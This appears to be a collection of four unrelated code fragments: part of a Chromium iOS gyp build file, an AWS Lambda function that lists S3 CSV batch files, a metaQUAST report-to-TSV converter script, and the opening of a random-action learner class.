'browser/autocomplete/in_memory_url_index_factory.h',
'browser/autocomplete/shortcuts_backend_factory.cc',
'browser/autocomplete/shortcuts_backend_factory.h',
'browser/autofill/form_input_accessory_view.h',
'browser/autofill/form_input_accessory_view.mm',
'browser/autofill/form_input_accessory_view_controller.h',
'browser/autofill/form_input_accessory_view_controller.mm',
'browser/autofill/form_input_accessory_view_delegate.h',
'browser/autofill/form_suggestion_controller.h',
'browser/autofill/form_suggestion_controller.mm',
'browser/autofill/form_suggestion_label.h',
'browser/autofill/form_suggestion_label.mm',
'browser/autofill/form_suggestion_provider.h',
'browser/autofill/form_suggestion_view.h',
'browser/autofill/form_suggestion_view.mm',
'browser/autofill/form_suggestion_view_client.h',
'browser/autofill/personal_data_manager_factory.cc',
'browser/autofill/personal_data_manager_factory.h',
'browser/bookmarks/bookmark_client_factory.cc',
'browser/bookmarks/bookmark_client_factory.h',
'browser/bookmarks/bookmark_client_impl.cc',
'browser/bookmarks/bookmark_client_impl.h',
'browser/bookmarks/bookmark_model_factory.cc',
'browser/bookmarks/bookmark_model_factory.h',
'browser/bookmarks/bookmarks_utils.cc',
'browser/bookmarks/bookmarks_utils.h',
'browser/bookmarks/startup_task_runner_service_factory.cc',
'browser/bookmarks/startup_task_runner_service_factory.h',
'browser/browser_state/bookmark_model_loaded_observer.cc',
'browser/browser_state/bookmark_model_loaded_observer.h',
'browser/browser_state/browser_state_info_cache.cc',
'browser/browser_state/browser_state_info_cache.h',
'browser/browser_state/browser_state_info_cache_observer.h',
'browser/browser_state/browser_state_keyed_service_factories.h',
'browser/browser_state/browser_state_keyed_service_factories.mm',
'browser/browser_state/browser_state_otr_helper.cc',
'browser/browser_state/browser_state_otr_helper.h',
'browser/browser_state/chrome_browser_state_impl_io_data.cc',
'browser/browser_state/chrome_browser_state_impl_io_data.h',
'browser/browser_state/chrome_browser_state_io_data.cc',
'browser/browser_state/chrome_browser_state_io_data.h',
'browser/browser_state/off_the_record_chrome_browser_state_io_data.h',
'browser/browser_state/off_the_record_chrome_browser_state_io_data.mm',
'browser/browser_state_metrics/browser_state_metrics.cc',
'browser/browser_state_metrics/browser_state_metrics.h',
'browser/browsing_data/ios_chrome_browsing_data_remover.cc',
'browser/browsing_data/ios_chrome_browsing_data_remover.h',
'browser/browsing_data_change_listening.h',
'browser/chrome_constants.cc',
'browser/chrome_constants.h',
'browser/chrome_paths.h',
'browser/chrome_paths.mm',
'browser/chrome_paths_internal.h',
'browser/chrome_switches.cc',
'browser/chrome_switches.h',
'browser/chrome_url_constants.cc',
'browser/chrome_url_constants.h',
'browser/chrome_url_util.h',
'browser/chrome_url_util.mm',
'browser/component_updater/ios_component_updater_configurator.cc',
'browser/component_updater/ios_component_updater_configurator.h',
'browser/content_settings/cookie_settings_factory.cc',
'browser/content_settings/cookie_settings_factory.h',
'browser/content_settings/host_content_settings_map_factory.cc',
'browser/content_settings/host_content_settings_map_factory.h',
'browser/crash_loop_detection_util.h',
'browser/crash_loop_detection_util.mm',
'browser/crash_report/breakpad_helper.h',
'browser/crash_report/breakpad_helper.mm',
'browser/crash_report/crash_keys.cc',
'browser/crash_report/crash_keys.h',
'browser/crash_report/crash_report_background_uploader.h',
'browser/crash_report/crash_report_background_uploader.mm',
'browser/crash_report/crash_report_multi_parameter.h',
'browser/crash_report/crash_report_multi_parameter.mm',
'browser/crash_report/crash_report_user_application_state.h',
'browser/crash_report/crash_report_user_application_state.mm',
'browser/crash_report/crash_upload_list.cc',
'browser/crash_report/crash_upload_list.h',
'browser/data_reduction_proxy/ios_chrome_data_reduction_proxy_io_data.cc',
'browser/data_reduction_proxy/ios_chrome_data_reduction_proxy_io_data.h',
'browser/data_reduction_proxy/ios_chrome_data_reduction_proxy_settings.cc',
'browser/data_reduction_proxy/ios_chrome_data_reduction_proxy_settings.h',
'browser/data_reduction_proxy/ios_chrome_data_reduction_proxy_settings_factory.cc',
'browser/data_reduction_proxy/ios_chrome_data_reduction_proxy_settings_factory.h',
'browser/dom_distiller/distiller_viewer.cc',
'browser/dom_distiller/distiller_viewer.h',
'browser/dom_distiller/dom_distiller_service_factory.cc',
'browser/dom_distiller/dom_distiller_service_factory.h',
'browser/experimental_flags.h',
'browser/experimental_flags.mm',
'browser/favicon/favicon_client_impl.cc',
'browser/favicon/favicon_client_impl.h',
'browser/favicon/favicon_loader.h',
'browser/favicon/favicon_loader.mm',
'browser/favicon/favicon_service_factory.cc',
'browser/favicon/favicon_service_factory.h',
'browser/favicon/ios_chrome_favicon_loader_factory.h',
'browser/favicon/ios_chrome_favicon_loader_factory.mm',
'browser/favicon/ios_chrome_large_icon_cache_factory.cc',
'browser/favicon/ios_chrome_large_icon_cache_factory.h',
'browser/favicon/ios_chrome_large_icon_service_factory.cc',
'browser/favicon/ios_chrome_large_icon_service_factory.h',
'browser/favicon/large_icon_cache.cc',
'browser/favicon/large_icon_cache.h',
'browser/file_metadata_util.h',
'browser/file_metadata_util.mm',
'browser/find_in_page/find_in_page_controller.h',
'browser/find_in_page/find_in_page_controller.mm',
'browser/find_in_page/find_in_page_model.h',
'browser/find_in_page/find_in_page_model.mm',
'browser/find_in_page/js_findinpage_manager.h',
'browser/find_in_page/js_findinpage_manager.mm',
'browser/first_run/first_run.h',
'browser/first_run/first_run.mm',
'browser/first_run/first_run_configuration.h',
'browser/first_run/first_run_configuration.mm',
'browser/first_run/first_run_metrics.h',
'browser/geolocation/CLLocation+OmniboxGeolocation.h',
'browser/geolocation/CLLocation+OmniboxGeolocation.mm',
'browser/geolocation/CLLocation+XGeoHeader.h',
'browser/geolocation/CLLocation+XGeoHeader.mm',
'browser/geolocation/location_manager.h',
'browser/geolocation/location_manager.mm',
'browser/geolocation/omnibox_geolocation_authorization_alert.h',
'browser/geolocation/omnibox_geolocation_authorization_alert.mm',
'browser/geolocation/omnibox_geolocation_config.h',
'browser/geolocation/omnibox_geolocation_config.mm',
'browser/geolocation/omnibox_geolocation_local_state.h',
'browser/geolocation/omnibox_geolocation_local_state.mm',
'browser/google/google_brand.h',
'browser/google/google_brand.mm',
'browser/google/google_url_tracker_client_impl.cc',
'browser/google/google_url_tracker_client_impl.h',
'browser/google/google_url_tracker_factory.cc',
'browser/google/google_url_tracker_factory.h',
'browser/history/history_backend_client_impl.cc',
'browser/history/history_backend_client_impl.h',
'browser/history/history_client_impl.cc',
'browser/history/history_client_impl.h',
'browser/history/history_service_factory.cc',
'browser/history/history_service_factory.h',
'browser/history/history_utils.cc',
'browser/history/history_utils.h',
'browser/history/top_sites_factory.cc',
'browser/history/top_sites_factory.h',
'browser/history/web_history_service_factory.cc',
'browser/history/web_history_service_factory.h',
'browser/infobars/confirm_infobar_controller.h',
'browser/infobars/confirm_infobar_controller.mm',
'browser/infobars/infobar.h',
'browser/infobars/infobar.mm',
'browser/infobars/infobar_container_ios.h',
'browser/infobars/infobar_container_ios.mm',
'browser/infobars/infobar_container_view.h',
'browser/infobars/infobar_container_view.mm',
'browser/infobars/infobar_controller.h',
'browser/infobars/infobar_controller.mm',
'browser/infobars/infobar_manager_impl.cc',
'browser/infobars/infobar_manager_impl.h',
'browser/infobars/infobar_utils.h',
'browser/infobars/infobar_utils.mm',
'browser/install_time_util.h',
'browser/install_time_util.mm',
'browser/installation_notifier.h',
'browser/installation_notifier.mm',
'browser/interstitials/ios_chrome_controller_client.h',
'browser/interstitials/ios_chrome_controller_client.mm',
'browser/interstitials/ios_chrome_metrics_helper.cc',
'browser/interstitials/ios_chrome_metrics_helper.h',
'browser/interstitials/ios_security_interstitial_page.h',
'browser/interstitials/ios_security_interstitial_page.mm',
'browser/invalidation/ios_chrome_profile_invalidation_provider_factory.cc',
'browser/invalidation/ios_chrome_profile_invalidation_provider_factory.h',
'browser/ios_chrome_field_trials.cc',
'browser/ios_chrome_field_trials.h',
'browser/ios_chrome_io_thread.cc',
'browser/ios_chrome_io_thread.h',
'browser/ios_chrome_main_parts.h',
'browser/ios_chrome_main_parts.mm',
'browser/memory/memory_debugger.h',
'browser/memory/memory_debugger.mm',
'browser/memory/memory_debugger_manager.h',
'browser/memory/memory_debugger_manager.mm',
'browser/memory/memory_metrics.cc',
'browser/memory/memory_metrics.h',
'browser/metrics/field_trial_synchronizer.cc',
'browser/metrics/field_trial_synchronizer.h',
'browser/metrics/ios_chrome_metrics_service_accessor.cc',
'browser/metrics/ios_chrome_metrics_service_accessor.h',
'browser/metrics/ios_chrome_metrics_service_client.cc',
'browser/metrics/ios_chrome_metrics_service_client.h',
'browser/metrics/ios_chrome_metrics_services_manager_client.cc',
'browser/metrics/ios_chrome_metrics_services_manager_client.h',
'browser/metrics/ios_chrome_stability_metrics_provider.cc',
'browser/metrics/ios_chrome_stability_metrics_provider.h',
'browser/metrics/ios_stability_metrics_provider.h',
'browser/metrics/ios_stability_metrics_provider.mm',
'browser/metrics/previous_session_info.h',
'browser/metrics/previous_session_info.mm',
'browser/net/chrome_cookie_store_ios_client.h',
'browser/net/chrome_cookie_store_ios_client.mm',
'browser/net/connection_type_observer_bridge.h',
'browser/net/connection_type_observer_bridge.mm',
'browser/net/cookie_util.h',
'browser/net/cookie_util.mm',
'browser/net/crl_set_fetcher.cc',
'browser/net/crl_set_fetcher.h',
'browser/net/http_server_properties_manager_factory.cc',
'browser/net/http_server_properties_manager_factory.h',
'browser/net/image_fetcher.h',
'browser/net/image_fetcher.mm',
'browser/net/ios_chrome_http_user_agent_settings.cc',
'browser/net/ios_chrome_http_user_agent_settings.h',
'browser/net/ios_chrome_network_delegate.cc',
'browser/net/ios_chrome_network_delegate.h',
'browser/net/ios_chrome_url_request_context_getter.cc',
'browser/net/ios_chrome_url_request_context_getter.h',
'browser/net/metrics_network_client.h',
'browser/net/metrics_network_client.mm',
'browser/net/metrics_network_client_manager.h',
'browser/net/metrics_network_client_manager.mm',
'browser/net/net_types.h',
'browser/net/proxy_service_factory.cc',
'browser/net/proxy_service_factory.h',
'browser/net/retryable_url_fetcher.h',
'browser/net/retryable_url_fetcher.mm',
'browser/ntp_snippets/ios_chrome_ntp_snippets_service_factory.cc',
'browser/ntp_snippets/ios_chrome_ntp_snippets_service_factory.h',
'browser/open_from_clipboard/create_clipboard_recent_content.h',
'browser/open_from_clipboard/create_clipboard_recent_content.mm',
'browser/passwords/credential_manager.h',
'browser/passwords/credential_manager.mm',
'browser/passwords/ios_chrome_password_manager_client.h',
'browser/passwords/ios_chrome_password_manager_client.mm',
'browser/passwords/ios_chrome_password_manager_driver.h',
'browser/passwords/ios_chrome_password_manager_driver.mm',
'browser/passwords/ios_chrome_password_manager_setting_migrator_service_factory.cc',
'browser/passwords/ios_chrome_password_manager_setting_migrator_service_factory.h',
'browser/passwords/ios_chrome_password_store_factory.cc',
'browser/passwords/ios_chrome_password_store_factory.h',
'browser/passwords/ios_chrome_save_password_infobar_delegate.h',
'browser/passwords/ios_chrome_save_password_infobar_delegate.mm',
'browser/passwords/js_credential_manager.h',
'browser/passwords/js_credential_manager.mm',
'browser/passwords/js_password_manager.h',
'browser/passwords/js_password_manager.mm',
'browser/passwords/password_controller.h',
'browser/passwords/password_controller.mm',
'browser/passwords/password_generation_agent.h',
'browser/passwords/password_generation_agent.mm',
'browser/passwords/password_generation_edit_view.h',
'browser/passwords/password_generation_edit_view.mm',
'browser/passwords/password_generation_offer_view.h',
'browser/passwords/password_generation_offer_view.mm',
'browser/passwords/password_generation_prompt_delegate.h',
'browser/passwords/password_generation_utils.h',
'browser/passwords/password_generation_utils.mm',
'browser/passwords/passwords_ui_delegate.h',
'browser/pref_names.cc',
'browser/pref_names.h',
'browser/prefs/browser_prefs.h',
'browser/prefs/browser_prefs.mm',
'browser/prefs/ios_chrome_pref_model_associator_client.cc',
'browser/prefs/ios_chrome_pref_model_associator_client.h',
'browser/prefs/ios_chrome_pref_service_factory.cc',
'browser/prefs/ios_chrome_pref_service_factory.h',
'browser/prefs/pref_observer_bridge.h',
'browser/prefs/pref_observer_bridge.mm',
'browser/procedural_block_types.h',
'browser/search/search_util.cc',
'browser/search/search_util.h',
'browser/search_engines/search_engines_util.cc',
'browser/search_engines/search_engines_util.h',
'browser/search_engines/template_url_service_client_impl.cc',
'browser/search_engines/template_url_service_client_impl.h',
'browser/search_engines/template_url_service_factory.cc',
'browser/search_engines/template_url_service_factory.h',
'browser/search_engines/ui_thread_search_terms_data.cc',
'browser/search_engines/ui_thread_search_terms_data.h',
'browser/services/gcm/ios_chrome_gcm_profile_service_factory.cc',
'browser/services/gcm/ios_chrome_gcm_profile_service_factory.h',
'browser/sessions/ios_chrome_session_tab_helper.cc',
'browser/sessions/ios_chrome_session_tab_helper.h',
'browser/sessions/ios_chrome_tab_restore_service_client.cc',
'browser/sessions/ios_chrome_tab_restore_service_client.h',
'browser/sessions/ios_chrome_tab_restore_service_factory.cc',
'browser/sessions/ios_chrome_tab_restore_service_factory.h',
'browser/signin/about_signin_internals_factory.cc',
'browser/signin/about_signin_internals_factory.h',
'browser/signin/account_consistency_service_factory.h',
'browser/signin/account_consistency_service_factory.mm',
'browser/signin/account_fetcher_service_factory.cc',
'browser/signin/account_fetcher_service_factory.h',
'browser/signin/account_reconcilor_factory.cc',
'browser/signin/account_reconcilor_factory.h',
'browser/signin/account_tracker_service_factory.cc',
'browser/signin/account_tracker_service_factory.h',
'browser/signin/browser_state_data_remover.h',
'browser/signin/browser_state_data_remover.mm',
'browser/signin/chrome_identity_service_observer_bridge.h',
'browser/signin/chrome_identity_service_observer_bridge.mm',
'browser/signin/constants.h',
'browser/signin/constants.mm',
'browser/signin/gaia_auth_fetcher_ios.h',
'browser/signin/gaia_auth_fetcher_ios.mm',
'browser/signin/gaia_auth_fetcher_ios_private.h',
'browser/signin/gaia_cookie_manager_service_factory.cc',
'browser/signin/gaia_cookie_manager_service_factory.h',
'browser/signin/ios_chrome_signin_status_metrics_provider_delegate.cc',
'browser/signin/ios_chrome_signin_status_metrics_provider_delegate.h',
'browser/signin/oauth2_token_service_factory.cc',
'browser/signin/oauth2_token_service_factory.h',
'browser/signin/signin_client_factory.cc',
'browser/signin/signin_client_factory.h',
'browser/signin/signin_client_impl.cc',
'browser/signin/signin_client_impl.h',
'browser/signin/signin_error_controller_factory.cc',
'browser/signin/signin_error_controller_factory.h',
'browser/signin/signin_manager_factory.cc',
'browser/signin/signin_manager_factory.h',
'browser/signin/signin_manager_factory_observer.h',
'browser/signin/signin_util.h',
'browser/signin/signin_util.mm',
'browser/snapshots/lru_cache.h',
'browser/snapshots/lru_cache.mm',
'browser/snapshots/snapshot_cache.h',
'browser/snapshots/snapshot_cache.mm',
'browser/snapshots/snapshot_manager.h',
'browser/snapshots/snapshot_manager.mm',
'browser/snapshots/snapshot_overlay.h',
'browser/snapshots/snapshot_overlay.mm',
'browser/snapshots/snapshots_util.h',
'browser/snapshots/snapshots_util.mm',
'browser/ssl/ios_chrome_security_state_model_client.cc',
'browser/ssl/ios_chrome_security_state_model_client.h',
'browser/ssl/ios_ssl_blocking_page.cc',
'browser/ssl/ios_ssl_blocking_page.h',
'browser/suggestions/image_fetcher_impl.h',
'browser/suggestions/image_fetcher_impl.mm',
'browser/suggestions/suggestions_service_factory.h',
'browser/suggestions/suggestions_service_factory.mm',
'browser/sync/glue/sync_start_util.cc',
'browser/sync/glue/sync_start_util.h',
'browser/sync/ios_chrome_profile_sync_service_factory.cc',
'browser/sync/ios_chrome_profile_sync_service_factory.h',
'browser/sync/ios_chrome_sync_client.cc',
'browser/sync/ios_chrome_sync_client.h',
'browser/sync/ios_chrome_synced_tab_delegate.cc',
'browser/sync/ios_chrome_synced_tab_delegate.h',
'browser/sync/sessions/ios_chrome_local_session_event_router.cc',
'browser/sync/sessions/ios_chrome_local_session_event_router.h',
'browser/sync/sync_observer_bridge.h',
'browser/sync/sync_observer_bridge.mm',
'browser/sync/sync_setup_service.cc',
'browser/sync/sync_setup_service.h',
'browser/sync/sync_setup_service_factory.cc',
'browser/sync/sync_setup_service_factory.h',
'browser/tab_parenting_global_observer.cc',
'browser/tab_parenting_global_observer.h',
'browser/translate/after_translate_infobar_controller.h',
'browser/translate/after_translate_infobar_controller.mm',
'browser/translate/before_translate_infobar_controller.h',
'browser/translate/before_translate_infobar_controller.mm',
'browser/translate/chrome_ios_translate_client.h',
'browser/translate/chrome_ios_translate_client.mm',
'browser/translate/never_translate_infobar_controller.h',
'browser/translate/never_translate_infobar_controller.mm',
'browser/translate/translate_accept_languages_factory.cc',
'browser/translate/translate_accept_languages_factory.h',
'browser/translate/translate_infobar_tags.h',
'browser/translate/translate_message_infobar_controller.h',
'browser/translate/translate_message_infobar_controller.mm',
'browser/translate/translate_service_ios.cc',
'browser/translate/translate_service_ios.h',
'browser/ui/UIView+SizeClassSupport.h',
'browser/ui/UIView+SizeClassSupport.mm',
'browser/ui/animation_util.h',
'browser/ui/animation_util.mm',
'browser/ui/autofill/autofill_client_ios.h',
'browser/ui/autofill/autofill_client_ios.mm',
'browser/ui/autofill/autofill_save_card_infobar.mm',
'browser/ui/background_generator.h',
'browser/ui/background_generator.mm',
'browser/ui/browser_otr_state.h',
'browser/ui/browser_otr_state.mm',
'browser/ui/commands/UIKit+ChromeExecuteCommand.h',
'browser/ui/commands/UIKit+ChromeExecuteCommand.mm',
'browser/ui/commands/clear_browsing_data_command.h',
'browser/ui/commands/clear_browsing_data_command.mm',
'browser/ui/commands/generic_chrome_command.h',
'browser/ui/commands/generic_chrome_command.mm',
'browser/ui/commands/ios_command_ids.h',
'browser/ui/commands/open_url_command.h',
'browser/ui/commands/open_url_command.mm',
'browser/ui/commands/set_up_for_testing_command.h',
'browser/ui/commands/set_up_for_testing_command.mm',
'browser/ui/commands/show_mail_composer_command.h',
'browser/ui/commands/show_mail_composer_command.mm',
'browser/ui/commands/show_signin_command.h',
'browser/ui/commands/show_signin_command.mm',
'browser/ui/file_locations.h',
'browser/ui/file_locations.mm',
'browser/ui/image_util.h',
'browser/ui/image_util.mm',
'browser/ui/keyboard/UIKeyCommand+Chrome.h',
'browser/ui/keyboard/UIKeyCommand+Chrome.mm',
'browser/ui/keyboard/hardware_keyboard_watcher.h',
'browser/ui/keyboard/hardware_keyboard_watcher.mm',
'browser/ui/native_content_controller.h',
'browser/ui/native_content_controller.mm',
'browser/ui/omnibox/web_omnibox_edit_controller.cc',
'browser/ui/omnibox/web_omnibox_edit_controller.h',
'browser/ui/orientation_limiting_navigation_controller.h',
'browser/ui/orientation_limiting_navigation_controller.mm',
'browser/ui/prerender_final_status.h',
'browser/ui/reversed_animation.h',
'browser/ui/reversed_animation.mm',
'browser/ui/rtl_geometry.h',
'browser/ui/rtl_geometry.mm',
'browser/ui/show_mail_composer_util.h',
'browser/ui/show_mail_composer_util.mm',
'browser/ui/show_privacy_settings_util.h',
'browser/ui/show_privacy_settings_util.mm',
'browser/ui/side_swipe_gesture_recognizer.h',
'browser/ui/side_swipe_gesture_recognizer.mm',
'browser/ui/size_class_support_util.h',
'browser/ui/size_class_support_util.mm',
'browser/ui/ui_util.h',
'browser/ui/ui_util.mm',
'browser/ui/uikit_ui_util.h',
'browser/ui/uikit_ui_util.mm',
'browser/ui/url_loader.h',
'browser/ui/webui/about_ui.cc',
'browser/ui/webui/about_ui.h',
'browser/ui/webui/crashes_ui.cc',
'browser/ui/webui/crashes_ui.h',
'browser/ui/webui/flags_ui.cc',
'browser/ui/webui/flags_ui.h',
'browser/ui/webui/gcm/gcm_internals_ui.cc',
'browser/ui/webui/gcm/gcm_internals_ui.h',
'browser/ui/webui/net_export/net_export_ui.cc',
'browser/ui/webui/net_export/net_export_ui.h',
'browser/ui/webui/sync_internals/sync_internals_message_handler.cc',
'browser/ui/webui/sync_internals/sync_internals_message_handler.h',
'browser/ui/webui/sync_internals/sync_internals_ui.cc',
'browser/ui/webui/sync_internals/sync_internals_ui.h',
'browser/ui/webui/version_handler.cc',
'browser/ui/webui/version_handler.h',
'browser/ui/webui/version_ui.cc',
'browser/ui/webui/version_ui.h',
'browser/undo/bookmark_undo_service_factory.cc',
'browser/undo/bookmark_undo_service_factory.h',
'browser/updatable_config/updatable_array.h',
'browser/updatable_config/updatable_array.mm',
'browser/updatable_config/updatable_config_base.h',
'browser/updatable_config/updatable_config_base.mm',
'browser/updatable_config/updatable_dictionary.h',
'browser/updatable_config/updatable_dictionary.mm',
'browser/update_client/ios_chrome_update_query_params_delegate.cc',
'browser/update_client/ios_chrome_update_query_params_delegate.h',
'browser/variations/ios_chrome_variations_service_client.cc',
'browser/variations/ios_chrome_variations_service_client.h',
'browser/web/dom_altering_lock.h',
'browser/web/dom_altering_lock.mm',
'browser/web/web_view_type_util.h',
'browser/web/web_view_type_util.mm',
'browser/web_data_service_factory.cc',
'browser/web_data_service_factory.h',
'browser/web_resource/web_resource_util.cc',
'browser/web_resource/web_resource_util.h',
'browser/xcallback_parameters.h',
'browser/xcallback_parameters.mm',
],
'conditions': [
['enable_rlz==1', {
'dependencies': [
'../../components/components.gyp:rlz',
'ios_chrome_browser_rlz',
],
}],
['safe_browsing!=0', {
'sources': [
'browser/safe_browsing/hit_report.cc',
'browser/safe_browsing/hit_report.h',
'browser/safe_browsing/ping_manager.cc',
'browser/safe_browsing/ping_manager.h',
'browser/safe_browsing/protocol_manager_helper.cc',
'browser/safe_browsing/protocol_manager_helper.h',
'browser/safe_browsing/safe_browsing_blocking_page.cc',
'browser/safe_browsing/safe_browsing_blocking_page.h',
'browser/safe_browsing/safe_browsing_service.cc',
'browser/safe_browsing/safe_browsing_service.h',
'browser/safe_browsing/ui_manager.cc',
'browser/safe_browsing/ui_manager.h',
'browser/safe_browsing/util.cc',
'browser/safe_browsing/util.h',
],
'dependencies': [
'../../crypto/crypto.gyp:crypto',
'ios_chrome_safe_browsing_proto',
],
}]
],
# TODO(crbug.com/569158): Suppresses warnings that are treated as errors
# when minimum iOS version support is increased to iOS 9 and up.
# This should be removed once all deprecation violations have been fixed.
'xcode_settings': {
'WARNING_CFLAGS': [
'-Wno-deprecated-declarations',
],
},
},
{
# GN version: //ios/chrome/browser:about_flags
# This is a separate target so that the 'defines' does not leak to the
# other files (which would increase the compilation time when changing
# the value).
'target_name': 'ios_chrome_browser_about_flags',
'type': 'static_library',
'include_dirs': [
'../..',
],
'dependencies': [
'../../base/base.gyp:base',
'../../components/components.gyp:autofill_core_common',
'../../components/components.gyp:dom_distiller_core',
'../../components/components.gyp:enhanced_bookmarks',
'../../components/components.gyp:flags_ui',
'../../components/components.gyp:sync_driver',
'../../components/components_strings.gyp:components_strings',
'../../google_apis/google_apis.gyp:google_apis',
'../web/ios_web.gyp:ios_web',
'ios_chrome_resources.gyp:ios_strings_gen',
],
'sources': [
'browser/about_flags.h',
'browser/about_flags.mm',
],
'defines': [
'GOOGLE_STAGING_API_URL="<(google_staging_api_url)"',
'GOOGLE_STAGING_LSO_URL="<(google_staging_lso_url)"',
'GOOGLE_TEST_API_URL="<(google_test_api_url)"',
'GOOGLE_TEST_LSO_URL="<(google_test_lso_url)"',
'GOOGLE_TEST_OAUTH_CLIENT_ID="<(google_test_oauth_client_id)"',
'GOOGLE_TEST_OAUTH_CLIENT_SECRET="<(google_test_oauth_client_secret)"',
'GOOGLE_TEST_OAUTH_URL="<(google_test_oauth_url)"',
'GOOGLE_TEST_SYNC_URL="<(google_test_sync_url)"',
],
'variables': {
'google_staging_api_url%': '',
'google_staging_lso_url%': '',
'google_test_api_url%': '',
'google_test_lso_url%': '',
'google_test_oauth_client_id%': '',
'google_test_oauth_client_secret%': '',
'google_test_oauth_url%': '',
'google_test_sync_url%': '',
},
},
{
# GN version: //ios/chrome/common
'target_name': 'ios_chrome_common',
'type': 'static_library',
'include_dirs': [
'../..',
],
'dependencies': [
'../../base/base.gyp:base',
'../../components/components.gyp:version_info',
'app_group_mainapp',
],
'link_settings': {
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/CoreGraphics.framework',
'$(SDKROOT)/System/Library/Frameworks/Foundation.framework',
],
},
'sources': [
'common/channel_info.h',
'common/channel_info.mm',
'common/string_util.h',
'common/string_util.mm',
],
},
{
# GN version: //ios/chrome/browser:injected_js
'target_name': 'injected_js',
'type': 'none',
'sources': [
'browser/find_in_page/resources/find_in_page.js',
'browser/passwords/resources/credential_manager.js',
'browser/passwords/resources/password_controller.js',
],
'includes': [ '../../ios/web/js_compile.gypi' ],
'link_settings': {
'mac_bundle_resources': [
'<(SHARED_INTERMEDIATE_DIR)/credential_manager.js',
'<(SHARED_INTERMEDIATE_DIR)/find_in_page.js',
'<(SHARED_INTERMEDIATE_DIR)/password_controller.js',
],
},
},
{
# GN version: //ios/chrome/common/app_group
'target_name': 'app_group_common',
'type': 'static_library',
'sources': [
'common/app_group/app_group_constants.h',
'common/app_group/app_group_constants.mm',
'common/app_group/app_group_metrics.h',
'common/app_group/app_group_metrics.mm',
],
'dependencies': [
# This target will be included into application extensions and the list
# of its dependencies must be kept as short as possible.
'../../base/base.gyp:base',
'../../components/components.gyp:version_info',
],
'include_dirs': [
'../..',
],
},
{
# GN version: //ios/chrome/common/app_group:client
'target_name': 'app_group_client',
'type': 'static_library',
'sources': [
'common/app_group/app_group_metrics_client.h',
'common/app_group/app_group_metrics_client.mm',
],
'dependencies': [
# This target will be included into application extensions and the list
# of its dependencies must be kept as short as possible.
'app_group_common',
],
'include_dirs': [
'../..',
],
},
{
# GN version: //ios/chrome/common/app_group:main_app
'target_name': 'app_group_mainapp',
'type': 'static_library',
'sources': [
'common/app_group/app_group_metrics_mainapp.h',
'common/app_group/app_group_metrics_mainapp.mm',
],
'dependencies': [
'app_group_common',
],
'include_dirs': [
'../..',
],
},
],
'conditions': [
['enable_rlz_support==1', {
'targets': [
{
# GN version: //ios/chrome/browser/rlz
'target_name': 'ios_chrome_browser_rlz',
'type': 'static_library',
'sources': [
'browser/rlz/rlz_tracker_delegate_impl.cc',
'browser/rlz/rlz_tracker_delegate_impl.h',
],
'dependencies': [
'../../components/components.gyp:google_core_browser',
'../../components/components.gyp:omnibox_browser',
'../../components/components.gyp:rlz',
'../../components/components.gyp:search_engines',
'../../rlz/rlz.gyp:rlz_lib',
],
},
],
}],
['safe_browsing!=0', {
'targets': [
{
# GN version: //ios/chrome/browser/safe_browsing:proto
'target_name': 'ios_chrome_safe_browsing_proto',
'type': 'static_library',
'sources': [ 'browser/safe_browsing/metadata.proto' ],
'variables': {
'proto_in_dir': 'browser/safe_browsing',
'proto_out_dir': 'ios/chrome/browser/safe_browsing',
},
'includes': [ '../../build/protoc.gypi' ],
},
],
}],
],
}
|
import boto3
import json
import os
def lambda_handler(event, context):
    """List pending CSV batch files and hand their keys to the state machine.

    Looks under ``batch-incoming/`` in the S3 bucket named by the ``BUCKET``
    environment variable. If no ``.csv`` files are found, the Step Functions
    execution identified by ``event['ExecutionId']`` is stopped.

    Returns a JSON string of the form {"Bucket": ..., "Keys": [...]}.
    """
    bucket = os.environ['BUCKET']
    path = 'batch-incoming/'
    # NOTE(review): list_objects_v2 returns at most 1000 keys per call and
    # the response is not paginated here, so batches larger than that would
    # be silently truncated — confirm expected batch sizes.
    resp = boto3.client('s3').list_objects_v2(
        Bucket=bucket,
        Prefix=path,
        MaxKeys=1000
    )
    # Keep only real .csv objects (len > 5 also rejects a bare ".csv" key).
    keys = [
        obj['Key']
        for obj in resp.get('Contents', [])
        if len(obj['Key']) > 5 and obj['Key'].endswith('.csv')
    ]
    if not keys:
        # Nothing to process: cancel the surrounding Step Functions execution.
        boto3.client('stepfunctions').stop_execution(
            executionArn=event['ExecutionId'],
            error='There are no files to process',
            cause=f'No files were found in the s3://{bucket}/{path}.'
        )
    return json.dumps({
        "Bucket": bucket,
        "Keys": keys
    })
|
#!/usr/bin/env python
from __future__ import print_function
import sys,os
import re
import argparse
import logging
# --- CLI definition ---------------------------------------------------------
# Short description shown at the top of --help output.
desc = 'Converting "contigs_report_contigs_filtered.mis_contigs.info" to a tsv table'
# Epilog printed verbatim (RawTextHelpFormatter) below the option list.
epi = """DESCRIPTION:
Only mis-assembly contigs will be included.
Output table columns:
*) contig ID
*) misassembly type(s)
Output is written to STDOUT
"""
parser = argparse.ArgumentParser(description=desc,
                                 epilog=epi,
                                 formatter_class=argparse.RawTextHelpFormatter)
# Positional argument: the metaQUAST misassembly report to convert.
parser.add_argument('report_file', metavar='report_file', type=str,
                    help='"contigs_report_contigs_filtered.mis_contigs.info" file created by metaQUAST')
parser.add_argument('--version', action='version', version='0.0.1')
# Timestamped, debug-level logging for the whole script.
logging.basicConfig(format='%(asctime)s - %(message)s', level=logging.DEBUG)
def main(args):
    """Print a two-column TSV (contig ID, misassembly types) to STDOUT.

    The report lists a contig ID on its own line, followed by zero or more
    "Extensive misassembly (...)" lines describing that contig.
    """
    print('\t'.join(['Contig', 'Extensive_misassembly']))
    misassemblies = {}
    current_contig = None
    with open(args.report_file) as handle:
        for raw in handle:
            raw = raw.rstrip()
            if raw.startswith('Extensive misassembly'):
                # Pull the type out of "...( type, details )" and join its
                # words with underscores so the value is one TSV token.
                mis_type = raw.split('(')[1].split(',')[0].split(')')[0].replace(' ', '_')
                misassemblies.setdefault(current_contig, []).append(mis_type)
            else:
                # Any non-misassembly line is the ID of the next contig.
                current_contig = raw
    for contig, types in misassemblies.items():
        print('\t'.join([contig, ';'.join(types)]))
if __name__ == '__main__':
    # Parse CLI arguments (parser defined at module level) and convert.
    args = parser.parse_args()
    main(args)
|
from ezcoach import Runner
from ezcoach.agent import Learner
from ezcoach.enviroment import Manifest
class RandomAlgorithm(Learner):
    """Learner that ignores the state and samples a random legal action.

    Plays a fixed number of episodes, then declines to start any more.
    """

    def __init__(self, num_episodes):
        # Total number of episodes this agent agrees to play.
        self._num_episodes = num_episodes
        # Environment manifest; supplied later through initialize().
        self._manifest: Manifest = None

